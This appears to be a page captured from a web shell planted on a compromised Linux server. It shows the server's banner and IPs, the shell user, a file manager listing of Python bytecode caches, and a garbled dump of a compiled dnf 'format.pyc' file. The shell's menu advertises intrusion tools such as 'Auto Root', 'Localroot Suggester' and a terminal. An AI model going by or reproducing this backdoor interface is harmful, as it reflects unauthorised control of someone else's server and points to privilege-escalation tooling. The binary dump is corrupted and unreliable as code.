Linux 162-55-97-189.cprapid.com 5.14.0-687.24.1.el9_8.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Jul 9 18:14:06 EDT 2026 x86_64
LiteSpeed
Server IP : 162.55.97.189 & Your IP : 216.73.216.182
Domains :
Cant Read [ /etc/named.conf ]
User : kavci
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
lib /
python3.9 /
site-packages /
dnf /
cli /
__pycache__ /
Delete
Unzip
Name
Size
Permission
Date
Action
__init__.cpython-39.opt-1.pyc
527
B
-rw-r--r--
2026-05-20 19:48
__init__.cpython-39.pyc
527
B
-rw-r--r--
2026-05-20 19:48
aliases.cpython-39.opt-1.pyc
5.36
KB
-rw-r--r--
2026-05-20 19:48
aliases.cpython-39.pyc
5.36
KB
-rw-r--r--
2026-05-20 19:48
cli.cpython-39.opt-1.pyc
32.36
KB
-rw-r--r--
2026-05-20 19:48
cli.cpython-39.pyc
32.42
KB
-rw-r--r--
2026-05-20 19:48
completion_helper.cpython-39.opt-1.pyc
8.23
KB
-rw-r--r--
2026-05-20 19:48
completion_helper.cpython-39.pyc
8.23
KB
-rw-r--r--
2026-05-20 19:48
demand.cpython-39.opt-1.pyc
1.56
KB
-rw-r--r--
2026-05-20 19:48
demand.cpython-39.pyc
1.56
KB
-rw-r--r--
2026-05-20 19:48
format.cpython-39.opt-1.pyc
2.31
KB
-rw-r--r--
2026-05-20 19:48
format.cpython-39.pyc
2.31
KB
-rw-r--r--
2026-05-20 19:48
main.cpython-39.opt-1.pyc
5.32
KB
-rw-r--r--
2026-05-20 19:48
main.cpython-39.pyc
5.32
KB
-rw-r--r--
2026-05-20 19:48
option_parser.cpython-39.opt-1.pyc
17.12
KB
-rw-r--r--
2026-05-20 19:48
option_parser.cpython-39.pyc
17.12
KB
-rw-r--r--
2026-05-20 19:48
output.cpython-39.opt-1.pyc
55.94
KB
-rw-r--r--
2026-05-20 19:48
output.cpython-39.pyc
56.01
KB
-rw-r--r--
2026-05-20 19:48
progress.cpython-39.opt-1.pyc
4.56
KB
-rw-r--r--
2026-05-20 19:48
progress.cpython-39.pyc
4.56
KB
-rw-r--r--
2026-05-20 19:48
term.cpython-39.opt-1.pyc
11.52
KB
-rw-r--r--
2026-05-20 19:48
term.cpython-39.pyc
11.54
KB
-rw-r--r--
2026-05-20 19:48
utils.cpython-39.opt-1.pyc
3.17
KB
-rw-r--r--
2026-05-20 19:48
utils.cpython-39.pyc
3.17
KB
-rw-r--r--
2026-05-20 19:48
Save
Rename
a �!c � @ s8 d dl mZ d dlmZ ddd�Zddd�Zdd � Zd S ) � )�unicode_literals)�long� c C s� g d�}|rd}nd}d}d}t |�d }| du r6d} | |krX||k rX|d }| | } q6t| t�slt| t�rrd }n| d k r�d}nd}|t| p�d�||| f S ) a� Return a human-readable metric-like string representation of a number. :param number: the number to be converted to a human-readable form :param SI: If is 0, this function will use the convention that 1 kilobyte = 1024 bytes, otherwise, the convention that 1 kilobyte = 1000 bytes will be used :param space: string that will be placed between the number and the SI prefix :return: a human-readable metric-like string representation of *number* ) r �k�M�G�T�P�E�Z�Yg @�@g �@i� r � Ng z%i%s%sgfffff�#@z%.1f%s%sz%.0f%s%s)�len� isinstance�intr �float) �numberZSI�spaceZsymbols�stepZthresh�depthZ max_depth�format� r �2/usr/lib/python3.9/site-packages/dnf/cli/format.py� format_number s"